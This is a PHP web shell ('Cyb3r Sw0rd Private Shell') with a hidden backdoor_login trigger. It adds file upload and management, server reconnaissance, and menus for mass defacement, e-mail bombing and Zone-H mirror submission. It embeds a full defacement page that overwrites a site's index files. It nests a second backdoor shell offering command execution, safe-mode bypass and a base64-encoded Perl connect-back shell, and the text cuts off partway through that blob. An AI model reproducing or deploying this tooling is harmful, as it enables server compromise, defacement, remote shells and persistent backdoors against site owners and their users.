<?php 
if ($_GET['backdoor_login']=='true')
{
echo "<a href=\"?backdoor_login=true&amp;do=file\"><div style=\"background-color:black; font-weight: bold; color:red; font-size: 25px;\">Create S-h-e-l-l</div></a>";
if ($_GET['do']=='file')
{
$scode = "<html>
<head>
<title>Cyb3r Sw0rd Private Shell V-1.1</title>
<style type='text/css'>
body
{
background-color: #000000;
font-family: Tahoma, Geneva, Verdana;
margin: auto;
color: #FFF;
}
.header
{
background-color: #222222;
color: #FFF;

border-top: 1px solid #067700;
border-bottom: 1px solid #067700;
text-align: center;
border-radius: 5px;
width:100%;
line-height: 40px;
font-size: 30px;
}
.box
{
background-color: #222222;
color: teal;
border-top: 1px solid #067700;
border-bottom: 1px solid #067700;
padding: 5px;
border-radius: 5px;
}
.box a{ padding: 5px; border: 1px solid #007700; box-shadow: 0px 0px 3 #007700; color: #007700; text-decoration: none;color: #007700; text-shadow: 0px 0px 0px #007700; font-weight: bold; font-family: Tahoma, Geneva, sans-serif; font-size:12px; padding: 1px; -webkit-border-radius: 4px;   -moz-border-radius: 4px;   border-radius: 4px;   -webkit-box-shadow: rgb(85,85,85) 0px 0px 0px;   -moz-box-shadow: rgb(85,85,85) 0px 0px 0px; }
.box a:hover{ padding: 5px; border: 1px solid #00bb00; color: #00ff00; box-shadow: 0px 0px 3px #00bb00; text-shadow: 0px 0px 3px #00bb00; padding: 1px; -webkit-border-radius: 4px;   -moz-border-radius: 4px;   border-radius: 4px;   -webkit-box-shadow: rgb(51,51,51) 0px 0px 3px;   -moz-box-shadow: rgb(51,51,51) 0px 0px 3px;}

.menu
{
background-color: #222222;
color: teal;
border-top: 1px solid #6D8397;
border-bottom: 1px solid #6D8397;
padding: 5px;
border-radius: 5px;
text-align:center;
}
.menu a{ padding: 5px; border: 1px solid #001DD3; box-shadow: 0px 0px 3 #007700; color: #001DD3; text-decoration: none;color: #001DD3; text-shadow: 0px 0px 0px #001DD3; font-weight: bold; font-family: Tahoma, Geneva, sans-serif; font-size:12px; padding: 1px; -webkit-border-radius: 4px;   -moz-border-radius: 4px;   border-radius: 4px;   -webkit-box-shadow: rgb(85,85,85) 0px 0px 0px;   -moz-box-shadow: rgb(85,85,85) 0px 0px 0px; }
.menu a:hover{ padding: 5px; border: 1px solid #4E63DC; color: #2194D7; box-shadow: 0px 0px 3px #2194D7; text-shadow: 0px 0px 3px #4E63DC; padding: 1px; -webkit-border-radius: 4px;   -moz-border-radius: 4px;   border-radius: 4px;   -webkit-box-shadow: rgb(51,51,51) 0px 0px 3px;   -moz-box-shadow: rgb(51,51,51) 0px 0px 3px;}
.filemanager{ margin-left: 100px; color: #FFF; background-color: #222222; padding: 2px; margin-right: 100px; border: 1px solid #007700; }
.filemanager a{ color: #FFF; font-size:18px; text-decoration:none;}
.filemanager a:hover{ text-shadow: 1px 2px 5px #FFF; }
.result {background-color: #87947A , color: #7ACA3C;}
.slogan {background-color: red; color: #FFF; position:fixed;bottom:0;right:0; left:0}
.thanksbox a {color: #E12729; font-weight: bold;}
.thanksbox a:hover{color: #000000; background-color: #E12729;}
.thanks_head{font-size:20; font-weight:bold}
table:hover {background-color: #FF0000;}
form {padding:0; margin:0;}
</style>
</head>
<body>
<div class="header">Cyb3r Sw0rd Private Shell  <span style="font-size:15px;font-family:Comic Sans MS; color:red;"><i><b>V-1.1</b></i></span></div>
<?php
error_reporting(E_ERROR | E_PARSE);
@ini_set("max_execution_time",0);
@set_time_limit(0); #No Fx in SafeMode
@ignore_user_abort(TRUE);
$self = $_SERVER["PHP_SELF"];
$action = get(action);
$result = "PGRpdiBjbGFzcz0ncmVzdWx0Jz4=";
$auth_pass = "OWYwYTQ0ODRiOTMzMTM0ZDAzZTFjMzVhZTlmYjkwYjY="; 
function file_size($size, $round = 2) {
$sizes = array('B', 'KB', 'MB', 'GB','TB');
$total = count($sizes)-1;
for ($i=0; $size > 1024 && $i < $total; $i++) $size /= 1024;
return round($size,$round)." ".$sizes[$i];
}
function Zip($source, $destination)
{
    if (!extension_loaded('zip') || !file_exists($source)) {
        return false;
    }

    $zip = new ZipArchive();
    if (!$zip->open($destination, ZIPARCHIVE::CREATE)) {
        return false;
    }

    $source = str_replace('\\', '/', realpath($source));

    if (is_dir($source) === true)
    {
        $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);

        foreach ($files as $file)
        {
            $file = str_replace('\\', '/', realpath($file));

            if (is_dir($file) === true)
            {
                $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
            }
            else if (is_file($file) === true)
            {
                $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
            }
        }
    }
    else if (is_file($source) === true)
    {
        $zip->addFromString(basename($source), file_get_contents($source));
    }

    return $zip->close();
}

function getperms ($file) {        
    $perm = substr(sprintf('%o', fileperms($file)), -4);
    return $perm;
}

if(isset($_GET['zip'])) {
    $src = $_GET['zip'];
    $dst = getcwd()."/".basename($_GET['zip']).".zip";
    if (Zip($src, $dst) != false) {
        $filez = file_get_contents($dst);
        header("Content-type: application/octet-stream");
        header("Content-length: ".strlen($filez));
        header("Content-disposition: attachment; filename=\"".basename($dst)."\";");
        echo $filez;
    }
    exit;
}

function showDrives()
    {
	    $self = $_SERVER["PHP_SELF"];
        $action = 'filemanager';
        foreach(range('A','Z') as $drive)
        {
		echo "<card id=\"main\" title=\"Drives\">";
            if(is_dir($drive.':\\'))
            {
                ?>
                &nbsp;&nbsp;&nbsp;&nbsp;<a href='<?php echo $self ?>?dir=<?php echo $drive.":\\"; ?>&action=<?php echo ".get(action)." ?>'>
                    <?php echo $drive ?>
                </a> 
                <?php
				
            }
				echo "</card>";
        }
    }


function HumanReadableFilesize($size)
    {
 
        $mod = 1024;
 
        $units = explode(' ','B KB MB GB TB PB');
        for ($i = 0; $size > $mod; $i++) 
        {
            $size /= $mod;
        }
 
        return round($size, 2) . ' ' . $units[$i];
    }
function getFilePermissions($file)
{
    
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
    // Socket
    $info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
    // Symbolic Link
    $info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
    // Regular
    $info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
    // Block special
    $info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
    // Directory
    $info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
    // Character special
    $info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
    // FIFO pipe
    $info = 'p';
} else {
    // Unknown
    $info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
            (($perms & 0x0800) ? 's' : 'x' ) :
            (($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
            (($perms & 0x0400) ? 's' : 'x' ) :
            (($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
            (($perms & 0x0200) ? 't' : 'x' ) :
            (($perms & 0x0200) ? 'T' : '-'));

return $info;

}
function dirSize($directory) {
    $size = 0;
    foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory)) as $file){
        try {       
            $size += $file->getSize();
        }
        catch (Exception $e){    // Symlinks and other shits
            $size += 0;
        }
    }
    return $size;
}
function get($s)
{
$g = $_GET[$s];
return $g;
}
function post($s)
{
$g = $_POST[$s];
return $g;
}
function DBconnection($DB_Name, $DB_User, $DB_Host, $DB_Pass)

{


    $conms = @mysql_connect($DB_Host,$DB_User,$DB_Pass); //connect mysql

    if(!$conms) return false;

    $condb = @mysql_select_db($DB_Name);

    if(!$condb) return false;

    return true;

}
function currentfile()
{
global $self;
$destiny = substr_count($self,'/');
$exp = explode('/',$self);
$file = $exp[$destiny];
return $file;
}
function mirror_zoneh($url, $hacker, $hackmode,$reson, $site )
{
        $k = curl_init();
        curl_setopt($k, CURLOPT_URL, $url);
        curl_setopt($k,CURLOPT_POST,true);
        curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
        curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
        $kubra = curl_exec($k);
        curl_close($k);return $kubra;
}
function getfiletype_src($iurl)
{
$slc = substr_count($iurl,'/');
$exp = explode('/',$iurl);
$name = $exp[$slc];
$slct = substr_count($name,'.');
$expt = explode('.',$name);
$type = $expt[$slct];
return $type;
}
echo '<div class="box">';
$serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
$clientIP = $_SERVER["REMOTE_ADDR"];
$total = disk_total_space("/");
$free = disk_free_space("/");
$used = $total-$free;
$parcent = ceil(($used*100)/$total);

echo 'Uname: <font color="00EF00">'.php_uname().'</font><br/>';
echo 'Total Space : <font color="00EF00">'.file_size(disk_total_space("/")).'</font> ';
echo 'Free Space : <font color="00EF00">'.file_size(disk_free_space("/")).'</font> ';
echo 'Used Space : <font color="00EF00">'.file_size($used)." ($parcent%)</font><br>";
echo 'Client IP: <font color="00EF00">'.$clientIP.'</font> ';
echo 'Server IP: <font color="00EF00">'.$serverIP.'</font><br/>';
echo 'PHP version: <font color="00EF00">'.phpversion().'</font> ';
echo 'User: <font color="00EF00">['.getmyuid().'] '.get_current_user().' ('.getmygid().')</font><br/>';
if(ini_get('safe_mode') == '1'){
echo ' Safe mode:<font color="00EF00"> ON&nbsp;</font></font> ';
}
else{
echo ' Safe mode:<font color="red"> OFF&nbsp;</font> ';
}
if(ini_get('magic_quotes_gpc') == '1'){
echo ' Magic_quotes_gpc:<font color="00EF00"> ON&nbsp;</font> ';
}
else{
echo ' Magic_quotes_gpc:<font color="red"> OFF&nbsp;</font> ';
}
if(function_exists('mysql_connect')){
echo ' Mysql:<font color="00EF00"> ON&nbsp;</font><br/>';
}
else{
echo ' Mysql:<font color="red"> OFF&nbsp;</font><br/>';
}
if(function_exists('mssql_connect')){
echo ' Mssql: <font color="00EF00"> ON&nbsp;</font> ';
}
else{
echo ' Mssql:<font color="red"> OFF&nbsp;</font> ';
}
if(function_exists('pg_connect')){
echo ' PostgreSQL:<font color="00EF00"> ON&nbsp;</font> ';
}
else{
echo ' PostgreSQL:<font color="red"> OFF&nbsp;</font> ';
}
if(function_exists('ocilogon')){
echo ' Oracle:<font color="00EF00"> ON&nbsp;</font> ';
}
else{
echo ' Oracle:<font color="red"> OFF&nbsp;</font> ';
}
if(function_exists('curl_version')){
echo ' Curl:<b class="tul"><font color="00EF00"> ON&nbsp;</font></b><br/>';
}
else{
echo ' Curl:<b class="tul"><font color="red"> OFF&nbsp;</font></b><br/>';
}
if(function_exists('exec')){
echo ' Exec:<font color="00EF00"> ON&nbsp;</font> ';
}
else{
echo ' Exec:<font color="red"> OFF&nbsp;</font> ';
}
if(!ini_get('open_basedir') != "on"){
echo ' Open_basedir:<font color="red"> OFF&nbsp;</font> ';
}
else{
echo ' Open_basedir:<font color="00EF00"> ON&nbsp;</font> ';
}
if(!ini_get('ini_restore') != "on"){
echo ' Ini_restore:<b class="tul"><font color="red"> OFF&nbsp;</font></b><br/>';
}
else{
echo ' Ini_restore:<b class="tul"><font color="00EF00"> ON&nbsp;</font></b><br/>';
}
if(function_exists('symlink')){
echo ' Symlink:<font color="00EF00"> ON&nbsp;</font> ';
}
else{
echo ' Symlink:<font color="red"> OFF&nbsp;</font> ';
}
if(function_exists('file_get_contents')){
echo ' file_get_contents:<font color="00EF00"> ON&nbsp;</font> ';
}
else{
echo ' file_get_contents:<font color="red"> OFF&nbsp;</font> ';
}
if(is_dir('sim/rut')){
echo ' Permission:<font color="00EF00"> ON&nbsp;</font><br/>';
}
else{
echo ' Permission:<font color="red"> OFF&nbsp;</font><br/>';
}
echo "Drives: ";showDrives();
if (get('dir')=="")
{
$current_dir = str_replace("\\",'/',getcwd());
}
else
{
$current_dir = get('dir');
}
$a=explode('/',$current_dir);
foreach ($a as $b)
{
$mexp = explode($b,$current_dir);
$read_break_dir = $mexp[0].$b;
$show_current_dir .=  "<a href=\"?dir=$read_break_dir&action=filemanager\">$b/</a>";
}
echo "<br/><card id=\"main\" title=\"Directories\"> CD: $show_current_dir <a href=$self?action=filemanager><font color=red>Current</font></a></card><br/>";
echo '</div>';
echo '<div class="menu">';
echo "<a href=$self>Home</a> 
<a href=?action=filemanager>File Manager</a> 
<a href=?action=symlink>Symlink</a> 
<a href=?action=zoneh>Mass Mirror</a> 
<a href=?action=massd>Mass Deface</a>
<a href=?action=mailbomber>E-mail Bomber</a>
<a href=?action=esql>SQL</a>
<a href=?action=hash>Hash</a>
<a href=?action=killme>Kill Me</a>
";
echo '</div>';
if (get(action)==filemanager)
{
echo "<div class=\"filemanager\">";
if (get('dir')=="")
{
$current_dir = str_replace("\\",'/',getcwd());
}
else
{
$current_dir = get('dir');
}

$scount = substr_count($current_dir,'/');
$exp = explode('/',$current_dir);
$name = $exp[$scount-1];
$mexp = explode($name,$current_dir);
$prevdir = $mexp[0].$name;
if ($scount>0)
{
$a=explode('/',$current_dir);
foreach ($a as $b)
{
$mexp = explode($b,$current_dir);
$read_break_dir = $mexp[0].$b;
$show_current_dir .=  "<a href=\"?action=filemanager&dir=$read_break_dir\">$b</a>/";
}
echo "<div class=\"results\">";
#File
if (isset($_POST["newfilename"]))
{
$filename = post(newfilename);
if (!file_exists($filename))
{
$source = "edit your source code here, coded by xl33tx_sn4p3r";
$fp = fopen($filename, 'w');
$r = fwrite($fp, $source);
fclose($fp);
echo "$filename File Created Successfully!<br/>";
}
else
{
header ("location: ?action=edit&file=$current_dir/$filename");
}

}
#Dir
if (isset($_POST["newdirname"]))
{
$newdirname = post(newdirname);
if (!file_exists($newdirname))
{
mkdir($newdirname);
echo "$newdirname Directory created successfully!<br/>";
}
else
{
header ("location: ?action=filemanager&dir=$current_dir/$newdirname");
}

}
#upload 
if (isset($_POST["upload_option"]) && $_POST["upload_option"]==1)
{
$safe = post(safedeface);
$target = post(target);
if ($safe==1)
{
if (file_exists($target.'/index.php'))
{
rename($target.'/index.php','index2.php');
}
if (file_exists($target.'/index.html'))
{
rename($target.'/index.html',$target.'/index2.html');
}
}
$default = post(defaultdeface);
if ($default==1)
{
$dsc = "

<html>
	<head>
		<title>
			Hacked by Cyb3r Sw0rd
		</title>
		<script language="JavaScript1.2">                            
var speed=1            
var currentpos=0,alt=1,curpos1=0,curpos2=-1               
function initialize(){               
startit()               
}               
function scrollwindow(){               
if (document.all)               
temp=document.body.scrollTop               
else               
temp=window.pageYOffset               
if (alt==0)               
alt=1               
else               
alt=0               
if (alt==0)               
curpos1=temp               
else               
curpos2=temp               
if (curpos1!=curpos2){               
if (document.all)               
currentpos=document.body.scrollTop+speed               
else               
currentpos=window.pageYOffset+speed               
window.scroll(0,currentpos)               
}               
else{               
currentpos=30               
window.scroll(0,currentpos)               
}               
}               
function startit(){               
setInterval("scrollwindow()",55)               
}               
window.onload=initialize               
</script>
<script>
/*function check(e)
{
alert(e.keyCode);
}*/
document.onkeydown = function(e) {
        if (e.ctrlKey && (e.keyCode === 67 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117)) {//Alt+c, Alt+v will also be disabled sadly.
            alert('Access Denied! Protected By Cyb3r Sw0rd!');
        }
        return false;
};
</script>
		<style>
			body{background: url(http://s27.postimg.org/tg0iaxobz/BGscarystuff.gif);}
			.top-bg{background:url(http://s21.postimg.org/m3pot5ytj/bloodani.gif) repeat-x;height: 25px;margin-top: -69px}
			.header{margin-top: -40px}
			.header h2{color: red;font-size: 80px;text-align: center;font-family: pieces nfi;text-shadow: 1px 5px 3px yellow}
			.logo{text-align: center;margin-top: -68px;}
			.logo img{width: 450px;height: 450px}
			h1,h2,h3,h4{color: #fff}
			.grets{color: green;font-size: 45px}
			.bis{color: red}
			.message{}
			.message h2{text-align: center;}
			.gretss{text-align: center;width: 960px;margin: 0 auto}
			.gretss h2{text-align: center;}
			a{color: #fff;text-decoration: none;}
			.msgh2{color: red}
			.rk a{color: yellow}
			.kb a{color: red}
			.sp a{color: green}
			.rz a{color: blue}
			.xs a{color: teal}
			.cb a{color: red}
			.ds a{color: brown}
			.sh a{color: #FA1459}
			.sn a{color: #1B12CC}
			.vc a{color: #AE0001}
			.bc a{color: #FCD208}
			.ih a{color: #E47725}
			.hb a{color: #0098F5}
			.lt a{color: #A6A6A6}
			.dk a{color: #FF3200}
			.fell {}
			.contacts{position: fixed;right: 0;bottom: 0}
			.contacts a img{width: 200px;height: 200px}
		</style>
	</head>
	<body oncontextmenu="return false;">
		<div class="top-bg">
		</div>
		<br>
		<br>
		<br>
		<br>
		<br>
		<br>
		<div class="header">
			<h2>Hacked by "Cyb3r Sw0rd"</h2>
		</div>
		<div class="logo">
			<img src="http://s12.postimg.org/tuv5l5p31/360x630_profile_logo.png">
		</div>
		<marquee class="grets">
			<h2 class="grets">Security Doesn't Exists in Our <span class="bis">Dictionary !!! </span>We Are <span class="bis">FEARLESS !!!</span> We Are <span class="bis"> UNITED !!!</span> We Are  <span class="bis">ONE !!! </span> We Are <span class="bis">UNBEATABLE !!!</span> </h2>
		</marquee>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<center>
<font size="20"><script> 
farbbibliothek = new Array(); 
farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100"); 
farbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00"); 
farbbibliothek[2] = new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00"); 
farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040"); 
farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000"); 
farbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF"); 
farbbibliothek[6] = new Array("#0000FF","#FFFF00"); 
farben = farbbibliothek[4];
function farbschrift() 
{ 
for(var i=0 ; i<Buchstabe.length; i++) 
{ 
document.all["a"+i].style.color=farben[i]; 
} 
farbverlauf(); 
} 
function string2array(text) 
{ 
Buchstabe = new Array(); 
while(farben.length<text.length) 
{ 
farben = farben.concat(farben); 
} 
k=0; 
while(k<=text.length) 
{ 
Buchstabe[k] = text.charAt(k); 
k++; 
} 
} 
function divserzeugen() 
{ 
for(var i=0 ; i<Buchstabe.length; i++) 
{ 
document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>"); 
} 
farbschrift(); 
} 
var a=1; 
function farbverlauf() 
{ 
for(var i=0 ; i<farben.length; i++) 
{ 
farben[i-1]=farben[i]; 
} 
farben[farben.length-1]=farben[-1]; 
 
setTimeout("farbschrift()",30); 
} 
// XLEETX SNAPER
var farbsatz=1; 
function farbtauscher() 
{ 
farben = farbbibliothek[farbsatz]; 
while(farben.length<text.length) 
{ 
farben = farben.concat(farben); 
} 
farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001)); 
} 
setInterval("farbtauscher()",4500); 
text= "== Feel Our Power == Feel What We are =="; 
//h 
string2array(text);
divserzeugen(); 
//document.write(text);   
//
/*
function expand() {
for(x = 0; x < 50; x++) {
window.moveTo(screen.availWidth * -(x - 50) / 100, screen.availHeight * -(x - 50) / 100);
window.resizeTo(screen.availWidth * x / 50, screen.availHeight * x / 50);
}
window.moveTo(0,0);
window.resizeTo(screen.availWidth, screen.availHeight);
}
expand();
*/
</script>
</font>
</center>
<br>
<br>
<br>
<br>
<br>
<br>
<!---
		<div class="fell1">== Feel Our Power == Feel What We are ==</div>
		== Dont Mass With Us ==</div>
		<div class="fell2">Remember My Eyes is On you</div>
--->
			<div class="message">
				<h2 class="msgh2">Message To Admin</h2>
					<h2>Dear Admin !!! </h2>
						<h2>Your Site Security is Good,</h2> 
						<h2>But not Enough to Stop "Cyb3r Sw0rd"</h2>
						<h2>We didn't Harm Your Site</h2>
						<h2>We Just Defaced</h2>
						<h2>Better Luck, Next Time!!!</h2>
						<h2>Dedicated To: The Great Lamer Named As "TANJIM BAL FUCKHIM"</h2>
<br>
<br>
<br>
<br>
<br>
<br>
			</div>
			<div class="gretss">
				<h2 class="msgh2">We Are</h2>
				<marquee>
					<h2><span class="rk"><a href="https://www.facebook.com/black.cod3r">!!! Bl4ck_C0d3R !!!</a></span> <span class="xs"><a href="https://www.facebook.com/xleetx">Xl33tX_Sn4p3R !!!</a></span> <span class="vc"><a href="https://www.facebook.com/v0dr0.chele">Vodro Chele !!!</a></span> <span class="cb"><a href="https://www.facebook.com/cyb3rsw0rd">Heart_Bleed !!!</a></span> <span class="bc"><a href="https://www.facebook.com/profile.php?id=100007989585081">Bidrohi Chinmoy !!!</a></span> <span class="ds"><a href="https://www.facebook.com/H4CK3RD55">Dreamless Sunny !!!</a></span> <span class="sh"><a href="https://www.facebook.com/profile.php?id=100008384708395">Stone Hearted Hiya !!!</a></span> <span class="sn"><a href="https://www.facebook.com/rafiqu.lislam4">Shopno Nill !!!</a></span> <span class="lt"><a href="https://www.facebook.com/gf.hacker">Leet Tomon !!!</a></span> <span class="ih"><a href="https://www.facebook.com/INCRYPT0.HAX0R">Incrypto Haxor !!!</a></span> <span class="dk"><a href="https://www.facebook.com/Dang3r.Khan">Danger Khan !!!</a></span> <span class="hb"><a href="https://www.facebook.com/profile.php?id=100005025676065">Hidden Baba !!!</a></span> <span class="cd"><a href="https://www.facebook.com/gugala1">Cyber Dark !!!</a></span></h2>
				</marquee>
			</div>
			<div class="contacts">
				<a target="_blank" href="https://www.facebook.com/pages/Cyb3r-Sw0rd-We-Are-Unbeatable/779632825422850"><img src="http://s12.postimg.org/tuv5l5p31/360x630_profile_logo.png"></a>
			</div>
	
	</body> <p align=center><script language="javascript" type="text/javascript"src="http://htmlfreecodes.com/userdata/heart.js"></script></p>
<a target="_blank" href="https://www.facebook.com/cyb3rsw0rd" style="font-size: 8pt; text-decoration: none"> </a>  <A HREF="https://www.facebook.com/cyb3rsw0rd"><FONT COLOR="#FF0000"> </FONT></A>
<br />
<a target="_blank" href="https://www.facebook.com/cyb3rsw0rd" style="font-size: 8pt; text-decoration: none"> </a>  
	<embed src="http://www.youtube.com/v/nZYcfjPSmOU&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">
</html>
<CENTER> <a href="http://tinypic.com?ref=25hmk5y" target="_blank"><img src="http://i57.tinypic.com/25hmk5y.gif" border="0" alt="Image and video hosting by TinyPic"></a> </CENTER>

<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<center><font color="red" size="3">	 Copyright &#169; Cyb3r Sw0rd </font></center>
<br>
<br>
<br>";
$fp = fopen($target.'/index.php', 'w');
$r = fwrite($fp, base64_decode($dsc));
fclose($fp);
$fp = fopen($target.'/index.html', 'w');
$r = fwrite($fp, base64_decode($dsc));
fclose($fp);
}
else
{
move_uploaded_file($_FILES['attach']['tmp_name'], $target."/".$_FILES['attach']['name']);
}
echo "File Uploaded Successfully!!";
}
#Backdoor
if ($_POST['backdoor']==1)
{
$source = "<?php 
if ($_GET['backdoor_login']=='true')
{
echo "<a href=\"?backdoor_login=true&amp;do=file\"><div style=\"background-color:black; font-weight: bold; color:red; font-size: 25px;\">Create S-h-e-l-l</div></a>";
if ($_GET['do']=='file')
{
$scode = "<?php
session_start();
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
$slash="\\";
}else{
$slash="/";
}
if ($_REQUEST['address']){
if(is_readable($_REQUEST['address'])){
chdir($_REQUEST['address']);}}

$me=$_SERVER['PHP_SELF'];
$formp="<form method=post action='".$me."'>";
$formg="<form method=get action='".$me."'>";
$nowaddress='<input type=hidden name=address value="'.getcwd().'">';
if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) {
   move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"]);
   $ifupload="Uploaded :D";
}
if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){
chmod($_POST['chmode'],"0".$_POST['chmodenum']);
}
$head='<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Moon</title>
</head><body  topmargin="0" leftmargin="0" rightmargin="0" 
bgcolor="#f2f2f2"><div align="center">
&nbsp;<table border="1" width="1000" height="14" bordercolor="#CDCDCD" style="border-collapse: collapse; border-style: solid; border-width: 1px">
<tr>
<td height="14" width="996">
<p align="center"><font face="Tahoma" style="font-size: 9pt"><span lang="en-us"><a href="?do=filemanger">File 
Manger</a> -- <a href="?do=cmd">Command Execute</a> -- <a href="?do=bc">Back Connect</a> --
<a href="?do=bypasscmd">BypasS Command eXecute(SF-DF)</a> --
<a href="?do=bypassdir">BypasS Directory</a> -- <a href="?do=eval&address='.getcwd().'">
Eval</a> -- <a href="?do=db">Data Base</a> -- <a href="?do=info">
Server Information</a></span></font></td></tr></table></div>
<div align="center">
<table id="table2" style="border-collapse: collapse; border-style: 
solid;" width="1000" bgcolor="#eaeaea" border="1" bordercolor="#c6c6c6" 
cellpadding="0"><tbody><tr><td><div align="center"><table id="table3" style="border-style:dashed; border-width:1px; margin-top: 20px; margin-bottom: 20px; 
border-collapse: collapse" width="950" border="1" bordercolor="#cdcdcd"
 height="620" bordercolorlight="#CDCDCD" bordercolordark="#CDCDCD"><tbody><tr>
<td style="border: 1px solid rgb(198, 198, 198);" 
width="950" bgcolor="#e7e3de" height="590" valign="top">';
$end='<p align="center">&nbsp;</td></tr></tbody></table></div></td></tr><tr><td bgcolor="#c6c6c6"><p style="margin-top: 0pt; margin-bottom: 0pt" align="center"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt">Coded by Amin Shokohi (Pejvak)<br><a href="http://www.itsecteam.com" target="_blank><font size=1>iTSecTeam.com</a></font></span></td></tr></tbody></table></div></body></html>';
$deny=$head."<p align='center'> <b>Oh My God!<br> Permission Denied".$end;
if ($_GET['do']=="edit" && $_GET['filename']!="dir"){
if(is_readable($_GET['address'].$_GET['filename'])){
$opedit=fopen($_GET['address'].$_GET['filename'],"r");
while(!feof($opedit))
$data.=fread($opedit,9999);
fclose($opedit); 
echo $head.$formp.$nowaddress.'<p align="center">File Name : '.$_GET['address'].$_GET['filename'].'<br><textarea rows="19" name="fedit" cols="87">'.htmlspecialchars("$data", ENT_QUOTES).'</textarea><br><input value="'.$_GET['filename'].'" name=namefe><br><input type=submit value="  Save  "></form></p>'.$end;exit;
}else{echo $deny;exit;}}
function sizee($size)
{
 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
 else {$size = $size . " B";}
 return $size;
}
function deleteDirectory($dir) {
if (!file_exists($dir)) return true;
if (!is_dir($dir) || is_link($dir)) return unlink($dir);
foreach (scandir($dir) as $item) {
if ($item == '.' || $item == '..') continue;
if (!deleteDirectory($dir . "/" . $item)) {
chmod($dir . "/" . $item, 0777);
if (!deleteDirectory($dir . "/" . $item)) return false;
};}return rmdir($dir);}
if($_GET['do']=="rename"){
echo $head.$formp.$nowaddress.'<p align="center"><input value='.$_GET['filename'].'><input type=hidden name=addressren value='.$_GET['address'].$_GET['filename'].'> To <input name=nameren><br><input type=submit value="  Save  "></form></p>'.$end;exit;
}
if ($_REQUEST['cdirname']){
if(is_writable($_REQUEST['address'])){
mkdir($_REQUEST['address'].$slash.$_REQUEST['cdirname'],"0777");}else{echo $deny;exit;}}
function bcn($ipbc,$pbc){
$bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
